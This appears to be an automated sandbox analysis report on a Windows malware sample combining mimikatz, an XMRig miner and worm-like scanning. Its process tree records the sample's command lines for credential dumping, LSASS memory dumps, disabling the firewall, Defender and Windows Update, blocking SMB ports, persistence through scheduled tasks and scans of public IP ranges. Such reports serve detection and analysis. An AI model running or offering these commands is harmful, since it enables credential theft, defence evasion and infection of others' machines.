Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-08-2024 07:47

General

  • Target

    2024-08-09_5f67da39b77d6aaedccf9b23ae8b703a_hacktools_icedid_mimikatz.exe

  • Size

    9.2MB

  • MD5

    5f67da39b77d6aaedccf9b23ae8b703a

  • SHA1

    a08c06c250f0dc9dffb11da53f2d5764683a927e

  • SHA256

    f6087fb644043bae37b399692233efe06249c2512411f80085592d37265692b4

  • SHA512

    55de0a91790ecedf1a06bc6d0ad620758d156470ee4bfd22e43a073aaa2c9eab54dac584818a0a71290c5e36d94f6478b57eceaf5420a6cd458a8a31593714aa

  • SSDEEP

    196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (30299) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

  • XMRig Miner payload 12 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 5 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 26 IoCs
  • Loads dropped DLL 12 IoCs
  • UPX packed file 34 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Creates a Windows Service
  • Drops file in System32 directory 18 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 39 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:1916
      • C:\Windows\TEMP\awlverzbi\nqrzsm.exe
        "C:\Windows\TEMP\awlverzbi\nqrzsm.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:4864
    • C:\Users\Admin\AppData\Local\Temp\2024-08-09_5f67da39b77d6aaedccf9b23ae8b703a_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-08-09_5f67da39b77d6aaedccf9b23ae8b703a_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1204
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\bekggbli\iuclszl.exe
        2⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:4428
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:2944
        • C:\Windows\bekggbli\iuclszl.exe
          C:\Windows\bekggbli\iuclszl.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:532
    • C:\Windows\bekggbli\iuclszl.exe
      C:\Windows\bekggbli\iuclszl.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3084
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1000
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:3528
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D users
          3⤵
          • System Location Discovery: System Language Discovery
          PID:728
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2896
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
          3⤵
          • System Location Discovery: System Language Discovery
          PID:212
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:3616
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
          3⤵
            PID:3092
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static del all
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:380
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static add policy name=Bastards description=FuckingBastards
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:2732
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static add filteraction name=BastardsList action=block
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:2824
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c C:\Windows\dvpvfgkqq\vefdcrtiv\wpcap.exe /S
          2⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3516
          • C:\Windows\dvpvfgkqq\vefdcrtiv\wpcap.exe
            C:\Windows\dvpvfgkqq\vefdcrtiv\wpcap.exe /S
            3⤵
            • Drops file in Drivers directory
            • Executes dropped EXE
            • Loads dropped DLL
            • Drops file in System32 directory
            • Drops file in Program Files directory
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2252
            • C:\Windows\SysWOW64\net.exe
              net stop "Boundary Meter"
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4904
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop "Boundary Meter"
                5⤵
                  PID:1996
              • C:\Windows\SysWOW64\net.exe
                net stop "TrueSight Meter"
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3560
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "TrueSight Meter"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:3052
              • C:\Windows\SysWOW64\net.exe
                net stop npf
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1612
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop npf
                  5⤵
                    PID:4232
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:2240
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:3900
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c net start npf
              2⤵
              • System Location Discovery: System Language Discovery
              PID:2192
              • C:\Windows\SysWOW64\net.exe
                net start npf
                3⤵
                  PID:2760
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    4⤵
                      PID:4260
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net start npf
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:64
                  • C:\Windows\SysWOW64\net.exe
                    net start npf
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:4568
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 start npf
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:4992
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c C:\Windows\dvpvfgkqq\vefdcrtiv\qeteblhlu.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\dvpvfgkqq\vefdcrtiv\Scant.txt
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:3992
                  • C:\Windows\dvpvfgkqq\vefdcrtiv\qeteblhlu.exe
                    C:\Windows\dvpvfgkqq\vefdcrtiv\qeteblhlu.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\dvpvfgkqq\vefdcrtiv\Scant.txt
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:1340
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c C:\Windows\dvpvfgkqq\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\dvpvfgkqq\Corporate\log.txt
                  2⤵
                  • Drops file in Windows directory
                  PID:2644
                  • C:\Windows\dvpvfgkqq\Corporate\vfshost.exe
                    C:\Windows\dvpvfgkqq\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3120
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "blssqdfbz" /ru system /tr "cmd /c C:\Windows\ime\iuclszl.exe"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:3476
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:4512
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /sc minute /mo 1 /tn "blssqdfbz" /ru system /tr "cmd /c C:\Windows\ime\iuclszl.exe"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:856
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "declipgtc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\bekggbli\iuclszl.exe /p everyone:F"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:2576
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                    3⤵
                      PID:3616
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /sc minute /mo 1 /tn "declipgtc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\bekggbli\iuclszl.exe /p everyone:F"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:2528
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "imcesgivu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\awlverzbi\nqrzsm.exe /p everyone:F"
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:4104
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:3000
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /sc minute /mo 1 /tn "imcesgivu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\awlverzbi\nqrzsm.exe /p everyone:F"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:1000
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:3480
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:1700
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:3716
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:1164
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:1712
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:2236
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:3600
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:1160
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:3560
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:716
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:876
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:2924
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net stop SharedAccess
                    2⤵
                      PID:4464
                      • C:\Windows\SysWOW64\net.exe
                        net stop SharedAccess
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:4260
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop SharedAccess
                          4⤵
                            PID:2760
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c netsh firewall set opmode mode=disable
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:384
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh firewall set opmode mode=disable
                          3⤵
                          • Modifies Windows Firewall
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Location Discovery: System Language Discovery
                          PID:4676
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c netsh Advfirewall set allprofiles state off
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:2252
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh Advfirewall set allprofiles state off
                          3⤵
                          • Modifies Windows Firewall
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Location Discovery: System Language Discovery
                          PID:2184
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c net stop MpsSvc
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:4440
                        • C:\Windows\SysWOW64\net.exe
                          net stop MpsSvc
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:1592
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 stop MpsSvc
                            4⤵
                            • System Location Discovery: System Language Discovery
                            PID:212
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c net stop WinDefend
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:3928
                        • C:\Windows\SysWOW64\net.exe
                          net stop WinDefend
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:4612
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 stop WinDefend
                            4⤵
                            • System Location Discovery: System Language Discovery
                            PID:2188
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c net stop wuauserv
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:4964
                        • C:\Windows\SysWOW64\net.exe
                          net stop wuauserv
                          3⤵
                            PID:3756
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop wuauserv
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:3000
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c sc config MpsSvc start= disabled
                          2⤵
                            PID:1488
                            • C:\Windows\SysWOW64\sc.exe
                              sc config MpsSvc start= disabled
                              3⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:856
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c sc config SharedAccess start= disabled
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:3520
                            • C:\Windows\SysWOW64\sc.exe
                              sc config SharedAccess start= disabled
                              3⤵
                              • Launches sc.exe
                              PID:4512
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c sc config WinDefend start= disabled
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:400
                            • C:\Windows\SysWOW64\sc.exe
                              sc config WinDefend start= disabled
                              3⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:1148
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c sc config wuauserv start= disabled
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:4288
                            • C:\Windows\SysWOW64\sc.exe
                              sc config wuauserv start= disabled
                              3⤵
                              • Launches sc.exe
                              PID:4060
                          • C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
                            C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 776 C:\Windows\TEMP\dvpvfgkqq\776.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2232
                          • C:\Windows\TEMP\xohudmc.exe
                            C:\Windows\TEMP\xohudmc.exe
                            2⤵
                            • Executes dropped EXE
                            • Drops file in System32 directory
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of SetWindowsHookEx
                            PID:5008
                          • C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
                            C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 316 C:\Windows\TEMP\dvpvfgkqq\316.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4868
                          • C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
                            C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 1916 C:\Windows\TEMP\dvpvfgkqq\1916.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4036
                          • C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
                            C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 2460 C:\Windows\TEMP\dvpvfgkqq\2460.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:60
                          • C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
                            C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 2784 C:\Windows\TEMP\dvpvfgkqq\2784.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1216
                          • C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
                            C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 388 C:\Windows\TEMP\dvpvfgkqq\388.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2372
                          • C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
                            C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 3152 C:\Windows\TEMP\dvpvfgkqq\3152.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1388
                          • C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
                            C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 3740 C:\Windows\TEMP\dvpvfgkqq\3740.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2200
                          • C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
                            C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 3832 C:\Windows\TEMP\dvpvfgkqq\3832.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:5072
                          • C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
                            C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 3892 C:\Windows\TEMP\dvpvfgkqq\3892.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4984
                          • C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
                            C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 3976 C:\Windows\TEMP\dvpvfgkqq\3976.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3060
                          • C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
                            C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 2916 C:\Windows\TEMP\dvpvfgkqq\2916.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2756
                          • C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
                            C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 3964 C:\Windows\TEMP\dvpvfgkqq\3964.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1704
                          • C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
                            C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 4736 C:\Windows\TEMP\dvpvfgkqq\4736.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:860
                          • C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
                            C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 3324 C:\Windows\TEMP\dvpvfgkqq\3324.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2416
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c C:\Windows\dvpvfgkqq\vefdcrtiv\scan.bat
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:3664
                            • C:\Windows\dvpvfgkqq\vefdcrtiv\nvmribbga.exe
                              nvmribbga.exe TCP 194.110.0.1 194.110.255.255 445 512 /save
                              3⤵
                              • Executes dropped EXE
                              • Drops file in Windows directory
                              • System Location Discovery: System Language Discovery
                              PID:4516
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                            2⤵
                              PID:3020
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:3880
                              • C:\Windows\SysWOW64\cacls.exe
                                cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:3516
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:3556
                              • C:\Windows\SysWOW64\cacls.exe
                                cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                3⤵
                                  PID:832
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                  3⤵
                                    PID:2232
                                  • C:\Windows\SysWOW64\cacls.exe
                                    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1996
                              • C:\Windows\SysWOW64\zebhau.exe
                                C:\Windows\SysWOW64\zebhau.exe
                                1⤵
                                • Executes dropped EXE
                                • Suspicious use of SetWindowsHookEx
                                PID:4848
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                1⤵
                                  PID:4912
                                • C:\Windows\system32\cmd.EXE
                                  C:\Windows\system32\cmd.EXE /c C:\Windows\ime\iuclszl.exe
                                  1⤵
                                    PID:4836
                                    • C:\Windows\ime\iuclszl.exe
                                      C:\Windows\ime\iuclszl.exe
                                      2⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetWindowsHookEx
                                      PID:1212
                                  • C:\Windows\system32\cmd.EXE
                                    C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\awlverzbi\nqrzsm.exe /p everyone:F
                                    1⤵
                                      PID:3968
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                        2⤵
                                          PID:4936
                                        • C:\Windows\system32\cacls.exe
                                          cacls C:\Windows\TEMP\awlverzbi\nqrzsm.exe /p everyone:F
                                          2⤵
                                            PID:1624
                                        • C:\Windows\system32\cmd.EXE
                                          C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\bekggbli\iuclszl.exe /p everyone:F
                                          1⤵
                                            PID:4164
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                              2⤵
                                                PID:4376
                                              • C:\Windows\system32\cacls.exe
                                                cacls C:\Windows\bekggbli\iuclszl.exe /p everyone:F
                                                2⤵
                                                  PID:800
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                1⤵
                                                  PID:1832
                                                • C:\Windows\system32\cmd.EXE
                                                  C:\Windows\system32\cmd.EXE /c C:\Windows\ime\iuclszl.exe
                                                  1⤵
                                                    PID:1016
                                                    • C:\Windows\ime\iuclszl.exe
                                                      C:\Windows\ime\iuclszl.exe
                                                      2⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:3328
                                                  • C:\Windows\system32\cmd.EXE
